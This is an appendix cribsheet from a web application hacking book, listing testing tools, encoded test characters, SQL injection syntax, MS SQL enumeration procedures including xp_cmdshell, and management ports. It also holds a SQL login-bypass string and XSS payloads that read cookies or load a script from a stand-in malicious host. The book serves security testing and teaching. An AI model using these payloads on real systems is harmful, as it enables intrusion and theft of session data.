Appendix B: Web Hacking Tools and Techniques Cribsheet

We've discussed numerous tools and techniques in this book for assessing the security of web applications. This appendix summarizes the most important of these in an abbreviated format designed for use in the field. It is structured around the web hacking methodology that comprises the chapters of this book.

Web Browsers and Open Proxies

Internet Explorer

http://www.microsoft.com/windows/ie/

Firefox

http://www.mozilla.com/firefox/

Open HTTP/S Proxies

http://www.publicproxyservers.com/

IE Extensions for HTTP/S Analysis

TamperIE

http://www.bayden.com/

IEWatch

http://www.iewatch.com

IE Headers

http://www.blunck.info/iehttpheaders.html

IE Developer Toolbar

Search http://www.microsoft.com

IE 5 Powertoys for WebDevs

http://www.microsoft.com/windows/ie/previous/webaccess/webdevaccess.mspx

Firefox Extensions for HTTP/S Analysis

LiveHTTP Headers

http://livehttpheaders.mozdev.org/

Tamper Data for Firefox

http://tamperdata.mozdev.org

Modify Headers

http://modifyheaders.mozdev.org

Web Developer Extension for Firefox

http://chrispederick.com/work/webdeveloper/

HTTP/S Proxy Tools

Burp Intruder

http://portswigger.net/intruder/

Fiddler HTTP Debugging Proxy

http://www.fiddlertool.com

OWASP WebScarab

http://www.owasp.org

Paros Proxy

http://www.parosproxy.org

Watchfire PowerTools

http://www.watchfire.com/securityzone/product/powertools.aspx

Sample Web Applications for Security Testing

OWASP/Foundstone SiteGenerator

http://owasp.net/forums/thread/428.aspx

OWASP WebGoat

http://www.owasp.org/software/webgoat.html

Foundstone Hacme Bank

http://www.foundstone.com/resources/proddesc/hacmebank.htm

Foundstone Hacme Books

http://www.foundstone.com/resources/proddesc/hacmebooks.htm

Command-line Tools

curl

http://curl.haxx.se/

Netcat

http://www.securityfocus.com/tools

Sslproxy

http://www.obdev.at/products/ssl-proxy/

OpenSSL

http://www.openssl.org/

Stunnel

http://www.stunnel.org/

Crawling Tools

Offline Explorer Pro

http://www.metaproducts.com/

Lynx

http://lynx.browser.org/

Wget

http://www.gnu.org/directory/wget.html

Wget for Windows

http://www.interlog.com/~tcharron/wgetwin.html

Teleport Pro

http://www.tenmax.com/teleport/pro/home.htm

Black Widow

http://www.softbytelabs.com/BlackWidow/

Free Web Application Security Scanners

Nikto

http://www.cirt.net/code/nikto.shtml

N-Stalker NStealth Free Edition

http://www.nstalker.com

Burp Suite

http://www.portswigger.net

Paros Proxy

http://www.parosproxy.org

OWASP WebScarab

http://www.owasp.org

Commercial Web Application Security Scanners and Services

Acunetix Enterprise Web Vulnerability Scanner

http://www.acunetix.com

Cenzic Hailstorm

http://www.cenzic.com

Ecyware GreenBlue Inspector

http://www.ecyware.com

Syhunt Sandcat Suite

http://www.syhunt.com

SPI Dynamics WebInspect

http://www.spidynamics.com

Watchfire AppScan

http://www.watchfire.com

NTObjectives NTOSpider

http://www.ntobjectives.com

Compuware DevPartner SecurityChecker

http://www.compuware.com

WhiteHat Security

http://www.whitehatsec.com

Code Analysis Tools

Jad, the Java decompiler

http://www.kpdus.com/jad.html

Inspector (formerly Bugscan)

http://www.hbgary.com

CodeAssure

http://www.securesw.com/products/

DevInspect

http://www.spidynamics.com/

Flawfinder

http://www.dwheeler.com/flawfinder/

RATS

http://www.securesw.com/resources/tools.html

SPLINT

http://lclint.cs.virginia.edu/

FXCop

http://www.gotdotnet.com/team/fxcop/

ITS4

http://www.cigital.com/

PREfast

Available in Microsoft Visual Studio 2005

Prexis

http://www.ouncelabs.com/

Coverity

http://www.coverity.com

DevPartner SecurityChecker

http://www.compuware.com/

Inspector (formerly Bugscan)

http://www.hbgary.com

Binary Analysis

Open Reverse Engineering Code

http://www.openrce.org

Ollydbg

http://www.ollydbg.de

Ollydbg Discussion Forum

http://community.reverse-engineering.net

IDA Pro

http://www.datarescue.com

Profiling Tools and Techniques

Httprint, the web server fingerprinting tool

http://net-square.com/httprint/

Site Digger

http://www.foundstone.com/resources/proddesc/sitedigger.htm

Wayback Machine

http://web.archive.org

Google search using "+www.victim.+com"

Identifying web application structure

Google search using "related:www.victim.com"

Related web sites

Google search using "parent directory" robots.txt

Finding robots.txt file

Authentication

Task

Tool/Technique

Resource

Local NTLM proxy

NTLM Authentication Proxy Server (APS)

http://www.geocities.com/rozmanov/ntlm/

Automated password guessing

WebCracker

http://online.securityfocus.com/tools/706

Automated password guessing

Brutus AET2

http://www.hoobie.net/brutus/index.html

Automated password guessing

Hydra

http://www.thc.org

CAPTCHA decoder

PWNtcha

http://sam.zoy.org/pwntcha/

Defeating SQL-based authentication

Using a known username, enter FOO' OR 1 = 1 -- in the password field

NA

Authorization/Session Management

Task

Tool/Technique

Resource

Cookie analysis

CookieSpy

http://camtech2000.net/Pages/CookieSpy.html

Base64 encode/decode

Perl MIME::Base64

http://search.cpan.org/search?mode=module&query=MIME%3A%3ABase64

MD5 encoding

Perl Digest::MD5 module

http://search.cpan.org/search?mode=module&query=Digest%3A%3AMD5

DES encryption/decryption

mcrypt

http://mcrypt.hellug.gr/

DES encryption/decryption

Perl Crypt::DES module

http://search.cpan.org/search?mode=module&query=Crypt%3A%3ADES

WebDAV Tools

Cadaver, command-line WebDAV client for UNIX/Linux

http://www.webdav.org/cadaver/

WebDAV client and server software implementations, listed by University of California, Irvine

http://www.ics.uci.edu/~ejw/authoring/implementation.html

Web Services/SOAP Tools

Web Service Studio

http://www.gotdotnet.com/team/tools/web_svc/default.aspx

SOAP Tools

http://soapclient.com/SoapTools.html

WSDigger

http://www.foundstone.com/resources/proddesc/wsdigger.htm

Input Validation

Task

Tool/Technique

Resource

Cross-site scripting tests

XSS Cheat Sheet by RSnake

http://ha.ckers.org/xss.html

Buffer overflow testing

NTOMax

http://www.foundstone.com

Fuzzing

SPIKE Proxy

http://www.immunitysec.com

Fuzzing

SPI Fuzzer

http://www.spidynamics.com

Security Library

DevInspect and SecureObjects

http://www.spidynamics.com

Popular Characters to Test Input Validation

Character

URL Encoding

Comments

'

%27

The mighty tick mark (apostrophe), absolutely necessary for SQL injection, produces informational errors

;

%3b

Command separator, line terminator for scripts

[null]

%00

String terminator for file access, command separator

[return]

%0a

Command separator

+

%2b

Represents [space] on the URL, good in SQL injection

<

%3c

Opening HTML tag

>

%3e

Closing HTML tag

%

%25

Useful for double decode, search fields; signifies ASP, JSP tag

?

%3f

Signifies PHP tag

=

%3d

Place multiple equal signs in a URL parameter

(

%28

SQL injection

)

%29

SQL injection

[space]

%20

Necessary for longer scripts

.

%2e

Directory traversal, file access

/

%2f

Directory traversal

SQL Formatting Characters

Description

'

Terminates a statement.

--

Single line comment. Ignores the remainder of the statement.

+

Space. Required to correctly format a statement.

,@variable

Appends variables. Helps identify stored procedures.

?Param1=foo&Param1=bar

Creates "Param=foo, bar". Helps identify stored procedures.

@@variable

Call an internal server variable.

PRINT

Returns an ODBC error but does not target data.

SET

Assigns variables. Useful for multiline SQL statements.

%

A wild card that matches any string of zero or more characters.

Basic SQL Injection Syntax

Query Syntax

Result

OR 1=1

Creates true condition for bypassing logic checks.

UNION ALL SELECT field FROM table WHERE condition

Retrieves all rows from a table if condition is true (e.g., 1=1).

INSERT INTO Users VALUES('neo', 'trinity')

Can bypass authentication.

Useful MS SQL Server Variables

@@language

@@microsoftversion

@@servername

@@servicename

@@version

Stored Procedures for Enumerating SQL Server

Stored Procedure

Description

sp_columns <table>

Most importantly, returns the column names of a table.

sp_configure [ name ]

Returns internal database settings. Specify a particular setting to retrieve just that value; for example, sp_configure 'remote query timeout (s)'.

sp_dboption

Views (or sets) user-configurable database options.

sp_depends <object>

Lists the tables associated with a stored procedure.

sp_helptext <object>

Describes the object. This is more useful for identifying areas where you can execute stored procedures. It rarely executes successfully.

sp_helpextendedproc

Lists all extended stored procedures.

sp_spaceused [object]

With no parameters, returns the database name(s), size, and unallocated space. If an object is specified, it will describe the rows and other information as appropriate.

sp_who2 [username] (and sp_who)

Displays usernames, the host from which they've connected, the application used to connect to the database, the current command executed in the database, and several other pieces of information. Both procedures accept an optional username. This is an excellent way to enumerate a SQL database's users as opposed to application users.

MS SQL Parameterized Extended Stored Procedures

Extended Stored Procedure

Description

xp_cmdshell <command>

The equivalent of cmd.exe; in other words, full command-line access to the database server. Cmd.exe is assumed, so you would only need to enter dir to obtain a directory listing. The default current directory is %SYSTEMROOT%\System32.

xp_regread <rootkey>, <key>, <value>

Reads a registry value.

xp_reg*

There are several other registry-related procedures. Reading a value is the most useful.

xp_servicecontrol <action>, <service>

Starts or stops a Windows service.

xp_terminate_process <PID>

Kills a process based on its process ID.

MS SQL Nonparameterized Extended Stored Procedures

Extended Stored Procedure

Description

xp_loginconfig

Displays login information, particularly the login mode (mixed, etc.) and default login.

xp_logininfo

Shows currently logged-in accounts. Only applies to NTLM accounts.

xp_msver

Lists SQL version and platform information.

xp_enumdsn

Enumerates ODBC data sources.

xp_enumgroups

Enumerates Windows groups.

xp_ntsec_enumdomains

Enumerates domains present on the network.

SQL System Table Objects

System Table Object

Description

syscolumns

All column names and stored procedures for the current database, not just the master.

sysobjects

Every object (such as stored procedures) in the database.

sysusers

All of the users who can manipulate the database.

sysfiles

The filename and path for the current database and its log file.

systypes

Data types defined by SQL or new types defined by users.

Default SQL Master Database Tables

Master Database Table

Description

sysconfigures

Current database configuration settings.

sysdevices

Enumerates devices used for databases, logs, and temporary files.

syslogins

Enumerates user information for each user permitted to access the database.

sysremotelogins

Enumerates user information for each user permitted to remotely access the database or its stored procedures.

sysservers

Lists all peers that the server can access as an OLE database server.

Common Ports Used for Web Management

Port

Typical Service

21

FTP for file transfer

22

Secure Shell (SSH) for remote management

23

Telnet for remote management

80

World Wide Web standard port

81

Alternate WWW

88

Alternate WWW (also Kerberos)

443

HTTPS

900

IBM Websphere administration client

2301

Compaq Insight Manager

2381

Compaq Insight Manager over HTTPS

4242

Microsoft Application Center Management

7001

BEA Weblogic administration

7002

BEA Weblogic administration over SSL

7070

Sun Java Web Server over SSL

8000

Alternate web server or web cache

8001

Alternate web server or management

8005

Apache Tomcat

8080

Alternate web server, or Squid cache control (cachemgr.cgi), or Sun Java Web Server

8100

Allaire JRUN

88x0

Ports 8810, 8820, 8830, and so on usually belong to ATG Dynamo

8888

Alternate web server

9090

Sun Java Web Server admin module

10000

Netscape Administrator interface (default)

Denial of Service

DDoS Attacks/tools compiled by David Dittrich

http://staff.washington.edu/dittrich/misc/ddos/

DoS Tools and Techniques

http://www.antiserver.it/Denial-Of-Service/

Client-side Analysis

Task

Tool/Technique

Resource

Cross-site scripting testing

ScreamingCSS

http://www.devitry.com/screamingCSS.html

Cross-site scripting testing

Injecting an IFRAME

<iframe src="[link_to_executable_content]"></iframe>

Cross-site scripting testing

Injecting a META REFRESH

<META HTTP-EQUIV="Refresh" CONTENT="1; URL=http://redirect_to_here.com/">

Cross-site scripting testing

Inject script elements

<script>document.write(document.cookie)</script><script>alert('Salut!')</script> <script src="http://www.malicious-host.foo/badscript.js"></script>

HTML injection

Inject script using style

<div style="background:url('javascript:alert(1)')">



Source: Hacking Exposed Web Applications, 3rd Edition (ISBN 0071740643, 2006).
